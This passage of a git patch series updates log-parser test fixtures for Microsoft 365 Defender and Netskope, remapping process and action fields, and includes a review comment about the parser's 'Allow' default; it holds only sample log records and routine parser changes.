+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
index 3e55ad2b0..6077ecfdc 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
index 55684497d..f33a1eb87 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 5a6e54961..3cedbfdb3 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 9304ca1cb..2f5082094 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,14 +22,10 @@
 "@timestamp": "2024-09-24T14:18:11.864114Z",
 "action": {
 "properties": {
- "LogonId": "0",
- "process": {
- "parent": {
- "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
- "FileSize": 11864,
- "LogonId": "0"
- }
- }
+ "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+ "InitiatingProcessFileSize": 11864,
+ "InitiatingProcessLogonId": "0",
+ "LogonId": "0"
 },
 "type": "ProcessCreated"
 },
From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com>
Date: Thu, 28 Nov 2024 09:40:42 +0100
Subject: [PATCH 290/317] Update Netskope/netskope_events/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 Netskope/netskope_events/ingest/parser.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index 7ce3a2543..b4606f079 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -36,7 +36,8 @@ stages:
 "@timestamp": "{{parse_date.datetime}}"
 observer.vendor: "Netskope"
 event.dataset: "{{parsed_event.message.type}}"
- event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}"
+ event.action: "{{parsed_event.message.activity}}"
+ action.name: "{{parsed_event.message.action or 'Allow'}}"
 event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}"
 event.duration: "{{parsed_event.message.conn_duration}}"
 user_agent.original: "{{parsed_event.message.user_agent}}"
From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001
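Review bot: The added `action.name` line still falls back to the literal `'Allow'` whenever `parsed_event.message.action` is absent, so records that carry no verdict at all are emitted with an allow verdict; the fixtures updated in PATCH 291 show this for admin audit records such as test_audit_log_login_failed.json and test_audit_log_deleted_inline_policy.json, which now expect `action.name: Allow` on a failed login and on a policy deletion. A rule that filters on `action.name == "Allow"` would treat those as permitted activity, so the field is better left unset when the source has no action: `action.name: "{{parsed_event.message.action}}"`. If the default is kept for compatibility with existing rules, a comment on that line stating that `Allow` means "no action field in the source record" rather than an observed verdict would prevent the misreading. `event.action` is now taken unconditionally from `activity`, which those audit fixtures do not carry; whether an empty value is dropped or stored depends on pipeline behaviour not visible here. The enclosing `stages:` mapping starts and ends outside the hunk.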
From: LenaigKaliou
Date: Thu, 28 Nov 2024 09:46:49 +0100
Subject: [PATCH 291/317] Fixing tests
---
 .../tests/test_audit_log_deleted_inline_policy.json | 4 +++-
 .../tests/test_audit_log_edit_admin_record.json | 4 +++-
 .../netskope_events/tests/test_audit_log_login_failed.json | 4 +++-
 .../tests/test_audit_log_login_successful.json | 4 +++-
 .../tests/test_audit_log_logout_successful.json | 4 +++-
 .../tests/test_audit_log_password_change_successful.json | 4 +++-
 Netskope/netskope_events/tests/test_connection_log.json | 4 +++-
 Netskope/netskope_events/tests/test_dlp_incident.json | 3 +++
 Netskope/netskope_events/tests/test_malware_alert.json | 5 ++++-
 Netskope/netskope_events/tests/test_nspolicy_block.json | 5 ++++-
 Netskope/netskope_events/tests/test_nspolicy_log.json | 3 +++
 Netskope/netskope_events/tests/test_nspolicy_upload.json | 3 +++
 Netskope/netskope_events/tests/test_user_alert.json | 5 ++++-
 13 files changed, 42 insertions(+), 10 deletions(-)
diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
index df70ea26e..c564471d7 100644
--- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
+++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
@@ -5,7 +5,6 @@
 "expected": {
 "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n",
 "event": {
- "action": "Allow",
 "category": [
 "configuration"
 ],
@@ -17,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T00:29:01Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
index 10b406a5f..952e5c0b6 100644
--- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
+++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
@@ -5,7 +5,6 @@
 "expected": {
 "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n",
 "event": {
- "action": "Allow",
 "category": [
 "configuration"
 ],
@@ -17,6 +16,9 @@
 ]
 },
 "@timestamp": "2022-05-02T11:09:47Z",
+ "action": {
+ "name": "Allow"
+ },
 "netskope": {
 "events": {
 "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
index 8a792a408..05b0456e2 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 01549d366..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { 
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 12e39be95..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index a2fa885de..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "iam" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 5c5218356..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n 
\"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "network" ], @@ -20,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 37ab6e32b..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 5e5f6de15..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Detection", + "action": "Download", "category": [ "malware" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json index 0d739d4fd..404b5d4ab 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_block.json +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
@@ -11,7 +11,7 @@ "expected": { "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
